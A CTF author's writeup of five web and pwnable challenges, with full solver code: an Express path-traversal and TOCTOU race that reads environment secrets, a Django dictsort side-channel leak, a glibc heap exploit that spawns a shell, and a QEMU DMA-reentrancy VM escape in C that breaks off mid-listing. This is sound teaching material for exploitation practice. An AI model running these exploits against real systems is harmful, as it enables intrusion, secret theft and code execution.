# [2022 Fall GoN Open Qual CTF](https://dreamhack.io/ctf/39) Author's Writeup Written by [Xion] This only contain writeups for challenges authored by me. All challenges will be made available on [Dreamhack Wargame site](https://dreamhack.io/wargame/). Big shoutouts to [Theori](https://theori.io/) for the awesome [Dreamhack](https://dreamhack.io) platform, and to [KAIST Graduate School of Information Security](https://gsis.kaist.ac.kr/) and [KAIST Cyber Security Research Center](https://csrc.kaist.ac.kr/) for the sponsorship. ## Table of Contents - [F. Heliodor](#F.-Heliodor) - [G. Emerald Tablet](#G.-Emerald-Tablet) - [H. Reconquista](#H.-Reconquista) - [I. Redis-made](#I.-Redis-made) - [J. NPU](#J.-NPU) ----- ### F. Heliodor Category: Web Author: [Xion] Solvers: 2 <details> <summary>Description</summary> A simple JSON-based filesystem service `Heliodor`. Like the strength of the golden beryl, never lose hope in reading the flag! </details> <details> <summary>Solution</summary> **Summary**: Exploit Express.js `res.download()` TOCTOU race condition between `fs.stat()` & `fs.createReadStream()` to read from `/proc/self/environ` based on another file's `stat` result An Express.js website with JSON-based filesystem storage features. Let's start with the easy steps: 1. Regex that matches a (very small) subset of [jq](https://stedolan.github.io/jq/) uses `/[0-9A-Za-z_-]*/` to match object keys. This allows the attacker to use an empty key, which is problematic since the expression is split by `.` and joined back with `/` to create a path to be used with filesystem operations later on. (ex: `.ab.cd => ab/cd` (relative), `..ab.cd` => `/ab/cd` (absolute)) 2. Taken from Node.js documentation for [`path.resolve()`](https://nodejs.org/docs/latest-v16.x/api/path.html#pathresolvepaths): `The given sequence of paths is processed from right to left, with each subsequent path prepended until an absolute path is constructed.` Thus, an absolute path from step 1 is returned as is without prepending `/tmp/jsonfs/`. Now we have arbitrary file read primitives[^1]. Since we see in the given Dockerfile that the flag is passed as an environment variable named `FLAG`, let's just read `/proc/self/environ` and volia! Right? Not so fast! Try `GET /query/view/..proc.self.environ`, and we're greeted with an empty response with `Content-Length: 0`[^2]. This primitive does however work on real files, so the only possible explanation is that since `/proc` is a virtual filesystem its size is returned as 0 on `stat` and etc, which is later used as `Content-Length` and limits how much file is read. Check out the implementation at [expressjs/express/response.js](https://github.com/expressjs/express/blob/33e8dc303af9277f8a7e4f46abfdcb5e72f6797b/lib/response.js#L550) which eventually leads to [pillarjs/send/index.js](https://github.com/pillarjs/send/blob/b69cbb3dc4c09c37917d08a4c13fcd1bac97ade5/index.js#L717) where we see `fs.stat()` called and its results used to [set ranges and Content-Length](https://github.com/pillarjs/send/blob/b69cbb3dc4c09c37917d08a4c13fcd1bac97ade5/index.js#L690), which later on [creates a read stream](https://github.com/pillarjs/send/blob/b69cbb3dc4c09c37917d08a4c13fcd1bac97ade5/index.js#L790) with `fs.createReadStream()`. Now this should immediately spark an idea for experienced players. If not, let's check [`fs.stat()`](https://nodejs.org/docs/latest-v16.x/api/fs.html#fsstatpath-options-callback) documentation. Why is `fs.stat() -> fs.readFile()` not recommended? Checking out similar warnings we see that `Doing so introduces a race condition, since other processes may change the file's state between the two calls` - this also applies to `fs.stat() -> fs.createReadStream()` as we have a TOCTOU race condition between when the file size is checked and when it is actually used. Let's continue on the not-so-easy steps: 3. To actually trigger the race condition, we need a path in filesystem that represents `/proc/self/environ` in one case, and a real file with large enough size in another. There is a great place for this: `/proc/self/fd/`, where each opened file descriptors are represented as a symlink to its corresponding file or directory. We can race the following two requests: 1. `GET /query/view/..proc.self.environ` to open a file descriptor for `/proc/self/environ` 2. `GET /query/view/..etc.passwd` to open a file descriptor for `/etc/passwd`. Other files would also work, for example `/heliodor/app.js`. Then, we can use the following request to read from the file descriptor: 3. `GET /query/view/..proc.self.fd.N`, where `N` is the file descriptor being raced 4. `/proc/self/environ` is leaked if the requests are executed in the following execution order: 1. Req #1: `open("/etc/passwd")` opens `/etc/passwd` as fd `N` 2. **Req #3: `stat("/proc/self/fd/N")` stats `/proc/self/fd/N -> /etc/passwd`** 3. Req #1: `close(N)` closes fd `N` 4. Req #2: `open("/proc/self/environ")` opens `/proc/self/environ` as fd `N` (fd reused) 5. **Req #3: `open("/proc/self/fd/N")` opens `/proc/self/fd/N -> /proc/self/environ`** 6. Req #3: Opened file `/proc/self/environ` is read with `stat`ed size as length, which is the size of `/etc/passwd` Players can launch the attack by running the three requests in parallel. A local shell is given to avoid players unintentionally DoSing the challenge server, but in fact triggering this race condition also works remotely over network with not much of a hassle. The above attack scenario uses two different files to race a file descriptor but directories also work (`/query/list/`), which is the case in the author's solver code. </details> <details> <summary>Solver Code</summary> Below exploit uses `/query/list/` endpoint to race two directory fds. As explained in the solution, one can completely ignore all the "jsonfs" features and only use `res.download()` to race between two file fds. ```python=1 #!/usr/bin/env python3 # init_jsonfs.py import requests from setting import HOST, PORT # reset jsonfs reset_url = f'http://{HOST}:{PORT}/update/reset' requests.post(reset_url).raise_for_status() # write files to extend race window init_url = f'http://{HOST}:{PORT}/update/patch' requests.post(init_url, json=[""]*100).raise_for_status() # create ./self/environ init_url = f'http://{HOST}:{PORT}/update/patch' requests.post(init_url, json={'self': {'environ': 'A'*10000}}).raise_for_status() ``` ```python=1 #!/usr/bin/env python3 # lister.py # NOTE: Run at least two in parallel! import requests from setting import HOST, PORT url = f'http://{HOST}:{PORT}/query/list/' url += ','.join(['.', '..proc'] * 1000) for cnt in range(0x100): print(cnt) requests.get(url).raise_for_status() ``` ```python=1 #!/usr/bin/env python3 # reader.py import requests import re from setting import HOST, PORT url = f'http://{HOST}:{PORT}/query/view/..proc.self.fd.%d.self.environ' # Try our best to widen the race window by making send() parse ranges # Range parsing between fs.stat() and fs.createReadStream() range_hdr = f'bytes=0-10000,' # One large range including all range_hdr += ','.join(['9-0','0-1','1-9','a-a']*1000) # 4000 other ranges headers = { 'Range': range_hdr, 'if-range': '"', # bypass invalid ranges by simulating expired ranges 'ETag': None, } for cnt in range(0x200): print(cnt) res = requests.get(url % 23, headers=headers).content if match := re.search(rb'FLAG=(GoN\{[^\}]+\})', res): print(match.group(1)) break ``` ```python=1 #!/usr/bin/env python3 # setting.py HOST, PORT = 'heliodor', 58283 ``` </details> ### G. Emerald Tablet Category: Web Author: [Xion] Solvers: 7 <details> <summary>Description</summary> The magically radiant `Emerald Tablet` known to bless its users with everlasting memory. It is rumored that with unparalleled determination and willpower one gets to know the secrets of the universe... </details> <details> <summary>Solution</summary> **Summary**: Infoleak in Django dictsort via attacker-controlled key ([CVE-2021-45116]) The given service can be used to list, view and upload inscriptions like a bulletin board system. An inscription is already uploaded with flag as its contents, but viewing inscriptions require uuid key randomly generated at upload unknown even to the uploader. A sorting feature is available via Django `dictsort` filter with user-controlled sort criteria, and we see that Django 4.0 is used: [CVE-2021-45116] is applicable. The above article explains the vulnerability so well, so I'll skip explaining the exploit in detail. In short, the key idea is that although we do not know any of the key uuids we can leak information by sorting each characters of the uuid key and checking how the order of all pairs change after sorting. Take for example 4 unknown string `A, B, C, D` of length >= 1. - Before sorting: `A, B, C, D` - After sorting by character at index 0: `C, B, D, A` - By sort result itself we see that `C[0] <= B[0] <= D[0] <= A[0]`. - By checking how every two string pairs change their order, we see that `(C, B)`, `(C, A)`, `(B, A)`, `(D, A)` changed. - `C[0] < B[0]`, `C[0] < A[0]`, `B[0] < A[0]`, `D[0] < A[0]` is guaranteed. - Combining the two results, we see that `C[0] < B[0] <= D[0] < A[0]`. Assuming that only characters `a`, `b` and `c` are possible, we can assure that `C[0] = 'a'`, `B[0], D[0] == 'b'`, `A[0] == 'c'`. Note that the order of pair constraint work because `dictsort` is a *stable sort*, i.e. all sorted elements retain their original ordering for all elements with the same sort criteria value. [CVE-2021-45116]: https://blog.sonarsource.com/disclosing-information-with-a-side-channel-in-django/ </details> <details> <summary>Solver Code</summary> ```python=1 #!/usr/bin/env python3 # async libs to accelerate sprays. This is completely optional :) import asyncio as aio import aiohttp import requests from bs4 import BeautifulSoup as BS from tqdm import tqdm import z3 import uuid HOST, PORT = 'localhost', 59909 URL = f'http://{HOST}:{PORT}' TARGET_COUNT, INCREMENT = 100, 100 def get_list(sort_key='-id'): bs = BS(requests.get(f'{URL}/list/?sort={sort_key}').text, 'html.parser') return [int(e.find('th').string) for e in bs.find('tbody').find_all('tr')] async def gather(url, data, spraycnt, n=10): semaphore = aio.Semaphore(n) # limit on max connections conn = aiohttp.TCPConnector(limit_per_host=50, limit=100, ttl_dns_cache=300) async with aiohttp.ClientSession(connector=conn) as session: async def poster(url): async with semaphore: async with session.post(url, data=data, allow_redirects=False) as response: return response.status == 302 and response.headers['Location'] == '/list/' return all(await aio.gather(*(poster(url) for _ in range(spraycnt)))) # spray inscriptions for random uuids def spray_up_to(cnt): last = max(get_list()) spraycnt = cnt - last if spraycnt > 0: loop = aio.get_event_loop() assert loop.run_until_complete(gather(f'{URL}/upload/', { 'inscriber': 'Xion', 'title': 'spray', 'data': 'a', }, spraycnt)) spray_up_to(TARGET_COUNT) # check sprayed inscriptions max_id = max(get_list()) print(f'{max_id = }') # assert unsorted == sorted w/ id to verify that dictsort is a stable sort assert get_list('key.urn.0') == list(range(1, max_id + 1)) flag_uuid = '' i = len(flag_uuid) while i < 32: # Inequality is a DAG-like one # Probably easily solvable with DP-like approach, but why bother :shrug: s = z3.Solver() sv = [0] + [z3.BitVec(f'{i}_{j}', 4) for j in range(1, max_id + 1)] if i == 12: # uuid version 0x4 i += 1 flag_uuid += '4' print(f'{i:02d}/32: {flag_uuid = }') continue elif i == 16: # uuid variant 1 (0b10??) for v in sv[1:]: s.add(v & 0b1100 == 0b1000) sort = get_list(f'key.hex.{i}') # Info from sorted (w/o unsorted) for j in range(1, len(sort)): s.add(z3.ULE(sv[sort[j - 1]], sv[sort[j]])) # Info from unsorted -> sorted for j in tqdm(range(len(sort))): for k in range(j + 1, len(sort)): if sort[j] > sort[k]: s.add(z3.ULT(sv[sort[j]], sv[sort[k]])) # Solution exists and is unique assert s.check() == z3.sat m = s.model() v = m[sv[1]].as_long() s.add(sv[1] != v) # Solution not unique, need more sprays if s.check() != z3.unsat: print('Failed uniqueness check, spraying more & retrying...') max_id += INCREMENT spray_up_to(max_id) continue i += 1 flag_uuid += f'{v:x}' print(f'{i:02d}/32: {flag_uuid = }') flag_uuid = str(uuid.UUID(hex=flag_uuid)) print(f'Leaked {flag_uuid = }') bs = BS(requests.get(f'{URL}/view/?id=1&key={flag_uuid}').text, 'html.parser') flag = bs.find('textarea').string.strip() print(f'{flag = }') ``` </details> ### H. Reconquista Category: Pwnable Author: [Xion] Solvers: 0 <details> <summary>Description</summary> It is year 2084. The world now bans all Notes from pwnable challenges. Anyone who attempt to make Notes are imprisoned by the Infinite Loop Enforcers in a mere std::thread(). As an avid Make Notes pwnable challenge solver, take on the `Reconquista` and restore the world order to the good old days of having countless "baby" Make Note pwnables with zero solvers. </details> <details> <summary>Solution</summary> **Summary**: TLS overflow to overwrite `tcbhead_t.dtv` & trigger arbitrary free + fake chunk realloc This is just the usual *Make Notes* style pwnable, but with the menu loop inside a thread. Array of `std::string` pointers of length 200 are saved in TLS. Since new notes are inserted without bounds check, there is an OOB bug on an array inside TLS where one can overwrite at most 55 (= 255 - 200) `std::string` pointers. With either debugging or prior knowledge, one can notice that TLS (in this case, the array of pointers) adjacently precedes TCB in memory. Thus the OOB writes from the array linearly overflow into TCB structure. Now one can try overflowing all 55 pointers, but immediately after the 6th overflow stack smashing is detected and aborts. This is because TCB structure contain [`uintptr_t stack_guard`](https://elixir.bootlin.com/glibc/glibc-2.35/source/sysdeps/x86_64/nptl/tls.h#L51) which is used as stack canary for the corresponding thread. Although exploiting this has shown up many times in CTFs, in this challenge it cannot be used since there is no stack overflow; it simply limits the possible overflows to 5 pointers or less[^3]. Since there are only 5 pointers to overwrite, one can exhaustively check what is in the first 0x28 bytes of a TCB structure. Notably, there is [`dtv_t *dtv`](https://elixir.bootlin.com/glibc/glibc-2.35/source/sysdeps/x86_64/nptl/tls.h#L46) which is a pointer to DTV (Dynamic Thread Vector). DTV is an array of pointers to each TLS sections required by the executable and loaded libraries. Checking how this structure is allocated and resized if needed, one can see that thread stack is cached for reuse after thread exit at [`get_cached_stack()`](https://elixir.bootlin.com/glibc/glibc-2.35/source/nptl/allocatestack.c#L134) where DTV is cleared and re-initialized. Following [`_dl_allocate_tls_init()`](https://elixir.bootlin.com/glibc/glibc-2.35/source/elf/dl-tls.c#L542) one can see that when current DTV to be reused is not big enough it is resized via `realloc()` at [`_dl_resize_dtv()`](https://elixir.bootlin.com/glibc/glibc-2.35/source/elf/dl-tls.c#L484). Since DTV counter can be controlled by the attacker with a well-placed `std::string`, one can trigger arbitrary free via DTV clearing as well as fake chunk realloc via DTV resizing[^4]. Now with the above heap exploit primitives the challenge is back to C++ *Make Notes* style pwnable. The arbitrary free primitive is hard to use since we do not have any address leaks. Fake chunk realloc is more useful, as the fake chunk and both prev & next chunk can be prepared as needed. These are the steps to exploit the fake chunk realloc primitive in the author's solution: 1. Allocate 200 dummy notes to fill up the array. 2. Create note (index = 200). Buffer area of this note serves as fake chunk's prevsize & size field. Set size = 0x565. - `0x565 == (0x140 + 0x420) | PREV_INUSE | NON_MAIN_ARENA` - `PREV_INUSE` because consolidation is not desired, and `NON_MAIN_ARENA` because it actually is in non main arena (thread arena). - `0x140 + 0x420` because DTV resizing will realloc as chunksize `0x140`, splitting out `0x420`. - If this split chunksize is in tcache bin size then it will be stashed into tcache bin. Thread initialization logic is run by thread spawner (main thread), so it gets stashed into main arena tcache bin which cannot be accessed inside the thread loop. - Creating a split chunksize larger than tcache max causes it to be re-inserted as an unsorted chunk at its corresponding arena, which is thread arena. 3. Create note (index = 201, dtv). This pointer address - 0x10 will be reallocated. 4. Create note (index = 202). Located at next chunk relative to the fake chunk, create two fake chunks with valid size and PREV_INUSE set. This serves as a guard chunk to pass abort checks and prevent consolidation. 5. Exit thread with choice 3, immediately re-entering a new thread and triggering fake chunk realloc. The above steps result in a 0x420-sized fake chunk located at an address larger than thread top so that allocations from the chunk would later overlap with chunks extended from top. Starting from the first note allocation, these chunks are immediately split out and allocated from unsorted chunk in order: 1. 0x290-sized chunk for tcache_perthread_struct of thread arena 2. 0x30-sized chunk for dtor_list (destructor list chain) for `NoteManager` 3. Newly created `std::string` note pwndbg output would be something like this (not real addresses but offsets from heap base): ``` pwndbg> heap 0x003270 Allocated chunk | PREV_INUSE | NON_MAIN_ARENA <= tcache_perthread_struct Addr: 0x003270 Size: 0x295 Allocated chunk | PREV_INUSE | NON_MAIN_ARENA <= dtor_list for nm Addr: 0x003500 Size: 0x35 Allocated chunk | PREV_INUSE | NON_MAIN_ARENA <= newly created chunk Addr: 0x003530 Size: 0x35 <= unsorted chunk here! Allocated chunk (PREV_INUSE = 0) <= fake chunk guard ``` Consecutive allocations deplete the unsorted chunk and start to expand top up to where it starts to overlap with chunks allocated from unsorted chunk (`tcache_perthread_struct`, `dtor_list`, `std::string`, etc.). Thus we now have overlapping chunks which is especially more powerful due to the overlap with tcache struct. These are the steps to create overlapping chunks to leak libc address, poison `tcache_perthread_struct` and fetch the poisoned fake chunk to overwrite `free@got` of libstdc++ and pop shell (initial depletion allocation omitted): 1. Create `std::string` buffer overlapping with tcache bins count. Set 0x100, 0x1f0 tcache bins count = 1 2. Create `std::string` where buffer pointer overlaps with tcache 0x100 bin => [buf, buf+0xf0) must include tcache 0x1f0 bin. This is guaranteed with embedded buffer (`length <= 0xf`) 3. Create more `std::string` to partial overwrite with already prexisting string buffer address => 1. Use the fact that `heap_info` located at start of thread heap mmap region is aligned by 0x4000000. This is due to [alloc_new_heap()](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/arena.c#L518). => 2. Partial overwrite 3 bytes ending with "\xa0\x08\x00". This points the buffer to `thread_arena.next`, which stores the address of main_arena. 4. View overwritten string to leak main_arena (libc base) 5. Pop tcache 0x100 chunk to overwrite tcache 0x1f0 bin, corrupting it to (`free@got` of libstdc++ - 0x10) 6. Pop tcache 0x1f0 chunk to get arbitrary write at `free@got`, overwriting it with `system` to trigger `system("sh")` at `free(old_buf)` of `std::string` buffer doubling logic </details> <details> <summary>Solver Code</summary> ```python=1 #!/usr/bin/env python3 from pwn import * DEBUG = False HOST, PORT = 'localhost', 38202 binary = ELF('../deploy/reconquista') libc = ELF('./libc.so.6') libcpp = ELF('./libstdc++.so.6.0.30') #context.log_level = 'debug' def menu(sel): p.sendlineafter(b'>> ', str(sel).encode()) def create(s): menu(1) p.sendlineafter(b'Payload: ', s) def view(idx): menu(2) p.sendlineafter(b'Call Sign: ', str(idx).encode()) p.recvuntil(b'Intel: ') return p.recvuntil(b'\n[[ Operation Plans ]]', drop=True) def exit_thread(): menu(3) if DEBUG: p = process(['../src/reconquista']) else: p = remote(HOST, PORT) for _ in range(200): create(b'AAAA') # We now construct the free dtv to be freed by _dl_resize_dtv(). # This chunk is located at thread arena, but free is done by the main thread: # If it gets inserted to the main thread tcache it's difficult to get it back out. create(b'PREVSIZE' + p16(0x565)) # 0x560 - 0x140 = 0x420 > tcache max size create(b'__DTV___') # Guard the fake chunk w/ two consecutive PREV_INUSE chunks payload = bytearray(cyclic(0x200)) payload[0xe8 :0x108] = p64(0x21) + p64(0)*3 payload[0x108:0x128] = p64(0x21) + p64(0)*3 create(payload) # Trigger fake DTV free exit_thread() # Spray from bottom create(b'chunk#4_') for _ in range(10): create(b'A'*0x10) # 0x30 + 0x30 create(b'A'*0x20) # 0x30 + 0x50 for _ in range(94): create(b'A'*0x10) # 0x30 + 0x30 # Chunk #1 @ 0x003170: set 0x100 & 0x1f0 tcache bins count = 1 payload = b'B'*0xf0 payload += p64(0) + p64(0x295) payload += p16(0) * 14 + p16(1) + p16(0)*14 + p16(1) + p16(0) * 34 payload += p64(0) * 12 # zeros up to 0xd0 assert len(payload) == 0x1e0 create(payload) # Chunk #2 @ 0x003360: overlap tcache 0x100 bin w/ string.buf create(b'chunk#2') # Chunk #3 prep @ 0x003390: prep chunk #3 partial overwrite for _ in range(2): create(b'C'*0x20) for _ in range(3): create(b'C') # Chunk #3 @ 0x003520: partial overwrite as &thread_arena.next to leak main_arena create(b'\xa0\x08') # Chunk #4 @ 0x003530: buf partially overwritten, leak main_arena main_arena = u64(view(0)) log.info (f'{main_arena = :#14x}') libc.address = main_arena - 0x219c80 assert libc.address & 0xfff == 0 log.success(f'{libc.address = :#14x}') HEAP_MAX = 0x4000000 # 2 * 4 * 1024 * 1024 * 8 offset = 0xe7000 # libm.so.6 offset += 0x1000 + 0x807000 # mmaps offset += HEAP_MAX * 2 # aligned alloc thread_heap = (libc.address - offset + (HEAP_MAX - 1)) & ~(HEAP_MAX - 1) log.info (f'{thread_heap = :#14x}') libcpp.address = libc.address + 0x248000 log.info (f'{libcpp.address = :#14x}') # Chunk #5 @ 0x003370: pop tcache 0x100 chunk payload = p64(0)*13 + p64(libcpp.got['free'] - 0x10) payload = payload.ljust(0xf0, b'\x00') create(payload) # Chunk #6 @ libcpp.got['free'] - 0x10 - 0x10: pop tcache 0x1f0 chunk for system("sh")! payload = b'sh'.ljust(0x10, b'\x00') payload += p64(libc.sym['system']) payload = payload.ljust(0xf8, b'\x00') create(payload) p.sendline(b'cat flag') p.interactive() ``` </details> ### I. Redis-made Category: Pwnable Author: [Xion] Solvers: 0 <details> <summary>Description</summary> Marcel Duchamp's Fountain (1917) had a profound influence on what we think art is. 105 years after the groundbreaking artwork, I present you a CTF chal heavily influenced by Ready-made art: `Redis-made`. </details> <details> <summary>Solution</summary> **Summary**: RCE on Redis latest (7.0.4) without `@admin` or `@dangerous` ([CVE-2022-35951], ~~disclosure in progress~~ disclosed) This challenge is based on Redis, a popular in-memory key-value storage. The challenge is "ready-made", i.e. there's nothing given but Redis latest Docker image with flag copied in. There are no publicly known vulnerabilities on Redis 7.0.4, so this challenge calls for a brand new vulnerability exploitable up to arbitrary code execution. Since the vulnerability nor the patch is publicly available, I'll refrain from dropping a 0-day here. Contrary to how crazy this challenge might seem, this challenge was meant to be a not-so-crazy introduction to finding new vulnerabilities with a *specific methodology*:wink: which is frequently used when analyzing a new target. **Updated:** Intended solution calls for [CVE-2022-35951]. Note that this vulnerability is not popped out of thin air, but is very closely related to [CVE-2022-31144] fixed on 7.0.4. Searching by the CVE number we get [PR #11002](https://github.com/redis/redis/pull/11002) and [Issue #10968](https://github.com/redis/redis/issues/10968) which contain a crash PoC and root cause explanation. Let us analyze this vulnerability and build up to the intended solution. To start with, this vulnerability occurs on Redis streams. Detailed explanation are available at [Redis Streams tutorial](https://redis.io/docs/data-types/streams-tutorial/) and [XAUTOCLAIM command documentation](https://redis.io/commands/xautoclaim/). The vulnerability occurs where `XAUTOCLAIM` returns a list of IDs deleted from PEL while claiming stream entries. The array to store deleted entries' IDs, `deleted_ids`, is only [allocated with size `count`](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3402) as this is by definition the maximum number of entries that the command attempts to claim. However, previous versions up to 7.0.3 lacked counting deleted entries, so the fix was to simply [account for it](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3424). Seems correct, right? There is in fact a critical exploitable anti-pattern. Revisit [`deleted_ids` allocation](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3402) and we see `zmalloc(count * sizeof(streamID))` instead of a `calloc()`-like approach. Since [`count` is only bounded up to LONG_MAX](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3359), simply adding `0x1000000000000000` to a normal `count` value overflows allocation size and enables us to overflow heap with exactly the same primitives as [CVE-2022-31144]! The latter exploitation steps are simple, we have near-arbitrary `streamID` overflow so use this to forge objects, do AAR/W and pop shell. The *specific methodology* of analyzing a new target meant to simply check recent vulnerabilities and analyze the patches :slightly_smiling_face: P.S.: [CVE-2022-35951] was discovered while designing this challenge which originally called for exploiting [CVE-2022-31144]. The exploit script literally required a single `count` value change to also make it work on 7.0.4. [CVE-2022-35951]: https://github.com/redis/redis/security/advisories/GHSA-5gc4-76rx-22c9 [CVE-2022-31144]: https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh </details> <details> <summary>Solver Code</summary> Try it out yourself! [Redis-made @ dreamhack.io](https://dreamhack.io/wargame/challenges/595/) ``` $ md5sum solver.py 89319e88d2dbd19841d160b8227158fc solver.py ``` </details> ### J. NPU Category: Pwnable Author: [Xion] Solvers: 1 <details> <summary>Description</summary> After years of laborious development, KAIST GoN finally managed to build a bleeding-edge device to serve all the "Make Note" cravings: Notes Processing Unit, a.k.a `NPU`. Try it out on QEMU and tell us what you think! </details> <details> <summary>Solution</summary> **Summary**: Custom QEMU driver exploit via [DMA MMIO reentrancy] ([Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape]) Custom QEMU driver with DMA MMIO features. All the operations does not have vulnerabilities like buffer overflow or exploitable integer overflows. However a mind-blowing vulnerability exist on guest DMA buffer read/write operations: [DMA MMIO reentrancy]. This is explained in depth in [Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape] paper. Since the above paper also explains the vulnerability so well, I'll skip explaining the details. In short, unlike actual devices using DMA, virtual devices are prone to "DMA reentrancy" which happens where the guest DMA buffer points to a DMA MMIO region instead of a plain memory region. This triggers a guest read/write operation in a DMA operation to recursively trigger another DMA operation, which may divert the device's state machine into an invalid state (mostly UAF). NPU device implementation is also prone to DMA reentrancy attack through `WRITE_NOTE_PROCESS_RWVEC` batched MMIO operation. Setting `RWvec.buf` to NPU device's MMIO region recursively triggers MMIO operations, which may cause the current `Note` to be freed when the current note is resized via `WRITE_RESET` or `WRITE_NOTE_RESIZE`. Following read/write operations through the RWvec result in UAF, which can be exploited to leak data and overwrite heap structures in host QEMU. Author's exploit use DMA reentrancy to trigger UAF and read tcache pointer, decode it to leak heap and compute TCG RWX address[^5], use DMA reentrancy again to trigger UAF and poison tcache to allocate `Note` inside the RWX region filled with NOPs terminated by shellcode. P.S.: DMA reentrancy is still an active issue in many virtualization software including QEMU: see [CVE-2022-2692](https://gitlab.com/qemu-project/qemu/-/issues/1171)! [DMA MMIO reentrancy]: https://gitlab.com/qemu-project/qemu/-/issues/556 [Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape]: https://qiuhao.org/Matryoshka_Trap.pdf </details> <details> <summary>Solver Code</summary> Solver code is not refined, so it might be a bit bloated :slightly_frowning_face: Most heap operations are done with DMA reentrancy to maximize exploit stability. ```c=1 /* * References: * https://ctftime.org/writeup/31188 * http://pzhxbz.cn/?p=164 */ #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <stdbool.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <sys/types.h> #define TRIGGER 0 #define CHECK(condition) \ do { \ if (!(condition)) { \ printf("[!] Check failed at %s:%d: %s\n", \ __FILE__, __LINE__, #condition); \ abort(); \ } \ } while (0); #define PCHECK(condition) \ do { \ if (!(condition)) { \ printf("[!] Check failed at %s:%d (%m): %s\n", \ __FILE__, __LINE__, #condition); \ abort(); \ } \ } while (0); #define READ_STATUS_CODE 0x0 #define READ_RWV_SUCCESS_COUNT 0x10 #define READ_NOTE_LEN 0x100 #define READ_NOTE_SCALAR 0x110 #define WRITE_RESET 0x0 #define WRITE_IDX 0x10 #define WRITE_LEN_OR_OFS 0x20 #define WRITE_RWV 0x30 #define WRITE_RWV_LEN 0x40 #define WRITE_NOTE_RESIZE 0x100 #define WRITE_NOTE_SCALAR 0x110 #define WRITE_NOTE_PROCESS_RWVEC 0x120 #define STATUS_SUCCESS 0 #define STATUS_UNKNOWN_MMIO 1 #define STATUS_INVALID_RW_SIZE 2 #define STATUS_OUT_OF_RANGE 3 #define STATUS_DMA_FAILED 4 typedef struct { uint64_t buf; uint16_t ofs; uint16_t len; uint8_t write; uint8_t __unused_13_3[3]; } __attribute__((packed)) RWvec; #define RWV(buf, ofs, len, write) ((RWvec){ buf, ofs, len, write }) uint8_t *mmio_virt; uint8_t *mmio_phys; uint64_t virt2phys(void *p) { uint64_t virt = (uint64_t)p; CHECK((virt & 0xfff) == 0); int fd = open("/proc/self/pagemap", O_RDONLY); PCHECK(fd != -1); uint64_t ofs = (virt / 0x1000) * 8; PCHECK(lseek(fd, ofs, SEEK_SET) == ofs); uint64_t phys; PCHECK(read(fd, &phys, 8 ) == 8); PCHECK(close(fd) == 0); // asserts the bit IS_PRESENT is set CHECK(phys & (1ULL << 63)); // flips out the status bits, and shifts the physical frame address to 64 bits phys = (phys & ((1ULL << 54) - 1)) * 0x1000; return phys; } uint64_t mmio_read(uint64_t addr); void mmio_assert_success(char *file, int line) { uint8_t status_code = mmio_read(READ_STATUS_CODE); #define CASE_FAIL(code) \ case code: \ printf("mmio_assert_success() failed at %s:%d: %s\n", file, line, #code); \ abort(); \ break; switch(status_code) { case STATUS_SUCCESS: break; CASE_FAIL(STATUS_UNKNOWN_MMIO) CASE_FAIL(STATUS_INVALID_RW_SIZE) CASE_FAIL(STATUS_OUT_OF_RANGE) CASE_FAIL(STATUS_DMA_FAILED) } #undef CASE_FAIL } #define mmio_write(addr, value) _mmio_write(addr, value, __FILE__, __LINE__) void _mmio_write(uint64_t addr, uint64_t value, char *file, int line) { *((volatile uint64_t*)(mmio_virt + addr)) = value; mmio_assert_success(file, line); } uint64_t mmio_read(uint64_t addr) { return *((volatile uint64_t*)(mmio_virt + addr)); } void mmio_open() { // Open and map I/O memory for NPU MMIO int mmio_fd = open("/sys/devices/pci0000:00/0000:00:02.0/resource0", O_RDWR | O_SYNC); PCHECK(mmio_fd != -1) mmio_virt = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0); PCHECK(mmio_virt != MAP_FAILED) PCHECK(close(mmio_fd) == 0); // Find NPU MMIO region physical address int mmio_res_fd = open("/sys/devices/pci0000:00/0000:00:02.0/resource", O_RDONLY); PCHECK(mmio_res_fd != -1) char addr_hex[2+16+1] = {0,}; PCHECK(read(mmio_res_fd, addr_hex, sizeof(addr_hex) - 1) == sizeof(addr_hex) - 1) PCHECK(close(mmio_res_fd) == 0); mmio_phys = (void*)strtoull(addr_hex, NULL, 16); } void *mmap_new(size_t size) { void *map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE | MAP_LOCKED, -1, 0); PCHECK(map != MAP_FAILED); PCHECK(mlock(map, size) == 0); return map; } int main(int argc, char *argv[]) { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("[*] 1. Map MMIO, allocate RWvec array & DMA buffer\n"); mmio_open(); printf(" [+] mmio_virt: %p\n", mmio_virt); printf(" [+] mmio_phys: %p\n", mmio_phys); uint16_t rwv_len; RWvec *rwv_virt = mmap_new(0x1000), *rwv_phys = virt2phys(rwv_virt); printf(" [+] rwv_virt: %p\n", rwv_virt); printf(" [+] rwv_phys: %p\n", rwv_phys); mmio_write(WRITE_RWV, rwv_phys); // Try to allocate contiguous memory of size 0x10000 uint8_t *dma_virt = NULL, *dma_phys = NULL; for (int i = 0; i < 0x10; i++) { uint8_t *map_virt = mmap_new(0x10000), *map_phys = virt2phys(map_virt); bool success = true; for (int j = 1; j < 0x10; j++) { if (virt2phys(map_virt + 0x1000 * j) != map_phys + 0x1000 * j) { success = false; break; } } if (success) { dma_virt = map_virt; dma_phys = map_phys; printf(" [*] Contiguous PA mmap found in %d tries\n", i); break; } } CHECK(dma_virt != NULL); printf(" [+] dma_virt: %p\n", dma_virt); printf(" [+] dma_phys: %p\n", dma_phys); // Allocate note #0 w/ size 0x1000, prepared w/ 0 ~ 0x7ff consts printf("[*] 2. Allocate consts note #0\n"); mmio_write(WRITE_IDX, 0); mmio_write(WRITE_LEN_OR_OFS, 0x1000); mmio_write(WRITE_NOTE_RESIZE, TRIGGER); for (int i = 0; i < 0x800; i++) { 